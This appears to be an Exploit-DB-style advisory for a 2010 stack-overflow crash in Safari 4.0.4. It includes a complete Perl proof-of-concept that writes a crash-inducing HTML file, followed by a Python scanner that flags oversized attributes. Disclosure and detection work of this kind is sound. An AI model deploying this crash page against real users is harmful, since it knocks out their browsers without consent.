Vendor: Safari
By: John Cobb
CVSS: 7.5 (HIGH)
CWE: 119 (Stack Overflow)
Product Name: Safari
Affected Version From: 4.0.4 (531.21.10)
Affected Version To: 4.0.4 (531.21.10)
Patch Exists: YES
Related CWE: N/A
CPE: apple:safari
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP (32-bit)
Year: 2010

Safari 4.0.4 (531.21.10) – Stack Overflow/run

This exploit is a proof-of-concept (POC) for a denial-of-service (DoS) vulnerability in Safari 4.0.4 (531.21.10). It was discovered by John Cobb in January 2010 and tested on Windows XP (32-bit) SP3. The Perl script below writes an HTML file whose body element carries a background attribute made up of a large number of 'A' characters; the script's comments record that Safari quits silently from 114516 characters upward and reports an illegal operation in cfnetwork.dll at 114719. When the file is opened in Safari, the browser crashes due to a stack overflow.

Mitigation:

Users should update to the latest version of Safari to ensure that they are not vulnerable to this exploit.

Exploit-DB raw data:

#!/usr/bin/perl
#
# Safari 4.0.4 (531.21.10) - Stack Overflow/run
# 0Day DoS POC by John Cobb - www.NoBytes.com - 20/01/2010 - [v1.0]
# Tested on WinXP (32bit) SP3
#
# Magic Numbers:
# 114516 -> 114718 : Safari quits without error
# 114719 : Safari quits with illegal operation:
# AppName: safari.exe
# AppVer: 5.31.21.10
# ModName: cfnetwork.dll
# ModVer: 1.450.5.0
# Offset: 000567a7

use strict;
use warnings;

my $filename = $ARGV[0];
my $buffer   = $ARGV[1];

# Both arguments are required; the original script printed the usage text
# but then carried on with an undefined buffer length.
if (!defined($filename) || !defined($buffer) || $buffer !~ /^\d+$/) {
    print "Usage: $0 <filename.html> <buffer>\n\n";
    exit 1;
}

# Minimal page whose <body background> attribute is $buffer 'A' characters
# (the markup is written exactly as the original PoC emits it).
my $header = "<html>\n<head>\n";
my $crash  = "<body background = \"" . "A" x $buffer . "\">" . "\n";
my $footer = "</html>" . "\n";

my $data = $header . $crash . $footer;

open(my $fh, '>', $filename) or die "Cannot open $filename for writing: $!\n";
print $fh $data;
close($fh);

exit 0;
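As an added, defender-side example that is not part of the original advisory or the PoC: a small scanner that parses an HTML document and flags any attribute value whose length reaches the 114516-character threshold recorded in the script's magic numbers. The threshold constant and the constructed sample documents are assumptions made here for illustration; the scanner is generic over tags and attributes, not limited to the body background case.

```python
"""Flag HTML attribute values long enough to match the Safari 4.0.4
background-attribute crash range documented in the PoC above."""
from html.parser import HTMLParser

# Lowest attribute length at which the PoC comments report Safari quitting
# (assumed here as the detection threshold; tune for your own environment).
CRASH_THRESHOLD = 114516


class OversizedAttrScanner(HTMLParser):
    """Records (tag, attribute, length) for every attribute value at or
    above the configured threshold, regardless of tag or attribute name."""

    def __init__(self, threshold=CRASH_THRESHOLD):
        super().__init__()
        self.threshold = threshold
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if value is not None and len(value) >= self.threshold:
                self.findings.append((tag, name, len(value)))


def scan_html(html, threshold=CRASH_THRESHOLD):
    """Parse `html` and return the list of oversized-attribute findings."""
    scanner = OversizedAttrScanner(threshold)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


def build_sample(length):
    """Constructed test input shaped like the PoC output: a body tag whose
    background attribute is `length` 'A' characters (not a real page)."""
    return '<html>\n<head>\n<body background = "' + "A" * length + '">\n</html>\n'


if __name__ == "__main__":
    for n in (1024, 114516, 114719):
        hits = scan_html(build_sample(n))
        print(n, "flagged" if hits else "clean", hits)
```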